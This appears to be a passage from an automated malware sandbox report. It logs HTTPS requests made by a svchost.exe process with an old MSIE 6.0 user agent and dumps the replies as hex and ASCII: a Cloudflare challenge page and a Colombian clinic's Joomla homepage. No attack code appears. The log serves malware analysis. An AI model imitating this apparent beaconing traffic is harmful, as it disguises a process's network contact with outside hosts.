                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc8863c103a67-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC371INData Raw: 31 65 36 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f
                                                                                                                                                                                                                                                                                                      Data Ascii: 1e68<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Co
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC372INData Raw: 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20
                                                                                                                                                                                                                                                                                                      Data Ascii: mpatible" content="IE=Edge"> <meta name="robots" content="noindex,nofollow"> <meta name="viewport" content="width=device-width,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js">
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC373INData Raw: 73 69 67 74 6f 61 2e 63 6f 6d 20 6e 65 65 64 73 20 74 6f 20 72 65 76 69 65 77 20 74 68 65 20 73 65 63 75 72 69 74 79 20 6f 66 20 79 6f 75 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 66 6f 72 65 20 70 72 6f 63 65 65 64 69 6e 67 2e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 70 42 34 59 47 4a 62 62 5f 6f 61 43 4f 42 58 6d 6f 2e 47 42 2e 4d 66 57 70 33 47 4d 39 5f 74 37 37 59 4b 6c 4d 49 4f 32 72 6c 30 2d 31 36 37 39 34 36 30 33 30 36 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 4e 41 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e
                                                                                                                                                                                                                                                                                                      Data Ascii: sigtoa.com needs to review the security of your connection before proceeding. </div> <form id="challenge-form" action="/?__cf_chl_f_tk=pB4YGJbb_oaCOBXmo.GB.MfWp3GM9_t77YKlMIO2rl0-1679460306-0-gaNycGzNCNA" method="POST" enctype="application
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC374INData Raw: 48 42 6f 68 43 4e 30 76 6b 46 50 6c 5f 5a 6b 77 58 2d 4a 36 6a 62 6a 74 31 6b 31 56 4a 78 31 69 62 30 61 5a 35 39 4b 41 36 4d 36 69 56 52 4c 61 69 56 2d 69 63 6c 61 79 33 6b 64 74 49 38 63 35 48 42 75 73 64 41 51 79 5a 42 45 57 39 5a 79 43 6b 59 42 78 45 6d 6d 34 67 45 5f 48 4a 74 51 4c 31 4a 45 6d 74 70 4d 57 48 4e 76 6b 55 75 75 5f 6b 67 57 58 54 6e 51 41 77 4e 75 77 57 4e 4e 34 69 56 7a 76 69 66 56 4c 6d 46 6d 66 44 59 7a 46 4e 43 53 6b 68 63 41 47 49 59 61 4d 76 5f 70 67 76 70 44 6d 72 6b 72 49 31 49 4a 76 4e 48 4d 73 6f 4f 44 36 50 43 4b 63 63 4c 6e 50 41 5f 55 5a 43 38 77 53 66 63 49 5f 65 79 67 33 52 56 7a 36 37 48 41 5a 78 72 6a 44 6c 56 71 47 6d 33 31 63 46 4d 4a 32 45 2d 53 70 71 47 51 42 2d 71 50 6d 44 69 75 35 53 46 7a 58 41 31 50 7a 41 4e 6e
                                                                                                                                                                                                                                                                                                      Data Ascii: HBohCN0vkFPl_ZkwX-J6jbjt1k1VJx1ib0aZ59KA6M6iVRLaiV-iclay3kdtI8c5HBusdAQyZBEW9ZyCkYBxEmm4gE_HJtQL1JEmtpMWHNvkUuu_kgWXTnQAwNuwWNN4iVzvifVLmFmfDYzFNCSkhcAGIYaMv_pgvpDmrkrI1IJvNHMsoOD6PCKccLnPA_UZC8wSfcI_eyg3RVz67HAZxrjDlVqGm31cFMJ2E-SpqGQB-qPmDiu5SFzXA1PzANn
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC376INData Raw: 20 20 20 20 20 20 20 20 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4e 6f 75 6e 63 65 3a 20 27 36 35 32 34 36 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 52 61 79 3a 20 27 37 61 62 62 63 38 38 36 33 63 31 30 33 61 36 37 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 61 31 32 33 38 30 31 61 34 65 38 62 64 33 31 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 70 42 34 59 47 4a 62 62 5f 6f 61 43 4f 42 58 6d 6f 2e 47 42 2e 4d 66 57 70 33 47 4d 39 5f 74 37 37 59 4b 6c 4d 49 4f 32 72 6c 30 2d 31 36 37 39 34 36 30 33 30 36 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 4e 41 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 46 50
                                                                                                                                                                                                                                                                                                      Data Ascii: cType: 'managed', cNounce: '65246', cRay: '7abbc8863c103a67', cHash: 'a123801a4e8bd31', cUPMDTk: "\/?__cf_chl_tk=pB4YGJbb_oaCOBXmo.GB.MfWp3GM9_t77YKlMIO2rl0-1679460306-0-gaNycGzNCNA", cFP
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC377INData Raw: 32 61 2b 35 44 4f 67 6f 6d 47 4f 56 70 6b 49 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 31 3a 20 27 74 48 7a 6a 72 4e 4d 6b 5a 41 63 66 75 53 4e 4a 72 57 59 38 77 77 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 41 4c 5a 4b 57 78 52 70 48 4b 38 61 4d 66 65 42 79 48 58 74 79 51 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 50 70 7a 30 44 6a 72 6d 45 33 6f 34 34 57 4d 64 5a 72 36 61 5a 51 52 73 51 3d 27 2c 0a 20 20 20 20
                                                                                                                                                                                                                                                                                                      Data Ascii: 2a+5DOgomGOVpkI=', i1: 'tHzjrNMkZAcfuSNJrWY8ww==', i2: 'ALZKWxRpHK8aMfeByHXtyQ==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cFPpz0DjrmE3o44WMdZr6aZQRsQ=',
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC378INData Raw: 31 36 37 39 34 36 30 33 30 36 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 4e 41 22 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 0a 20 20 20 20 7d 28 29 29 3b 0a 3c 2f
                                                                                                                                                                                                                                                                                                      Data Ascii: 1679460306-0-gaNycGzNCNA" + window._cf_chl_opt.cOgUHash); cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[0].appendChild(cpo); }());</
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC379INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      37192.168.2.562498172.67.164.178443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC427OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:22 UTC770INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:22 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Cache-Control: private, no-store
                                                                                                                                                                                                                                                                                                      Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Set-Cookie: d55e479f054c94814cbc10d217aaa990=17bd424ec616aaefbc29a26735181352; path=/; HttpOnly
                                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 22 Mar 2023 04:45:22 GMT
                                                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IEb9bPb06%2BE%2B%2B8%2FHJ3A2R32wM7%2FHysnzcqoUMy5v4c3CNuCQ7v54vWPcqPCjAC5dJHxehSjqDbIL4TdKAbAf8Ris0lDcOc2uuBZiTUPhjZExVFAYr%2BTxfwjBJO6Ajv7NsrnNTnEUAiQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc886cb8e39df-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:22 UTC771INData Raw: 36 30 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20 2f
                                                                                                                                                                                                                                                                                                      Data Ascii: 601<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/" /
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:22 UTC771INData Raw: 61 72 61 20 6c 61 20 4d 75 6a 65 72 20 79 20 65 6c 20 4e 69 c3 b1 6f 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e
                                                                                                                                                                                                                                                                                                      Data Ascii: ara la Mujer y el Nio</title><link href="/plugins/system/rokbox/assets/styles/rokbox.css" rel="stylesheet" /><link href="/modules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:22 UTC772INData Raw: 31 31 62 61 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 6a 75 69 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 6a 75 69 2f 6a 73 2f 6a 71 75 65 72 79 2d 6e 6f 63 6f 6e 66 6c 69 63 74 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 6a 75 69 2f 6a 73 2f 6a 71 75 65 72 79 2d 6d 69 67 72 61 74 65 2e 6d 69 6e 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35
                                                                                                                                                                                                                                                                                                      Data Ascii: 11ba<script src="/media/jui/js/jquery.min.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/jui/js/jquery-noconflict.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/jui/js/jquery-migrate.min.js?989da4646a1a0dfff9a5685
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:22 UTC774INData Raw: 69 6e 73 65 72 74 42 65 66 6f 72 65 28 61 2c 6d 29 0a 20 20 20 20 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 61 6e 61 6c 79 74 69 63 73 2e 6a 73 27 2c 27 67 61 27 29 3b 20 20 20 20 67 61 28 27 63 72 65 61 74 65 27 2c 20 27 55 41 2d 37 35 36 37 31 38 32 39 2d 31 27 2c 20 27 61 75 74 6f 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 61 28 27 73 65 6e 64 27 2c 20 27 70 61 67 65 76 69 65 77 27 29 3b 0a 20 20 20 20 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 65 20 49 45 20 38 29 26 28 6c 74 65 20 49 45 20 39 29 5d 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76
                                                                                                                                                                                                                                                                                                      Data Ascii: insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-75671829-1', 'auto'); ga('send', 'pageview'); </script>...[if (gte IE 8)&(lte IE 9)]> <script type="text/jav
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:22 UTC775INData Raw: 74 65 6d 2d 6d 65 73 73 61 67 65 73 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 6e 61 76 69 67 61 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 31 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 2d 39 38 39 39 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                                                      Data Ascii: tem-messages"></div></div></div></div></section><section id="g-navigation"><div class="g-container"> <div class="g-grid"><div class="g-block size-21"><div id="logo-9899-particle" class="g-content g-particle"> <a href="/" title="" rel="home" class
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:22 UTC776INData Raw: 20 6d c3 a9 64 69 63 6f 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 64 69 76 3e 20 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 75 6d 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 73 75 62 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67
                                                                                                                                                                                                                                                                                                      Data Ascii: mdico</span></span><span class="g-menu-parent-indicator"></span> </div> <ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li class="g-dropdown-column"><div class="g-grid"><div class="g-block size-100"><ul class="g-sublevel"><li class="g
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:22 UTC777INData Raw: 33 39 61 32 0d 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 65 64 69 61 74 72 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20
                                                                                                                                                                                                                                                                                                      Data Ascii: 39a2<a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-menu-item-content"><span class="g-menu-item-title">Pediatras</span></span></a></li><li class="g-menu-item g-menu-item-type-component
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:22 UTC778INData Raw: 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 51 75 69 c3 a9 6e 65 73 20 73 6f 6d 6f 73 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70
                                                                                                                                                                                                                                                                                                      Data Ascii: lass="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent=""> <span class="g-separator g-menu-item-content"> <span class="g-menu-item-title">Quines somos </span></span><sp
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:22 UTC779INData Raw: 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 76 61 6c 6f 72 65 73 2d 63 6f 72 70 6f 72 61 74 69 76 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 56
                                                                                                                                                                                                                                                                                                      Data Ascii: s</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/valores-corporativos"><span class="g-menu-item-content"><span class="g-menu-item-title">V
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:22 UTC781INData Raw: 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 75 6d 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67
                                                                                                                                                                                                                                                                                                      Data Ascii: le">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li class="g-dropdown-column"><div class="g-grid"><div class="g-block size-100"><ul class="g
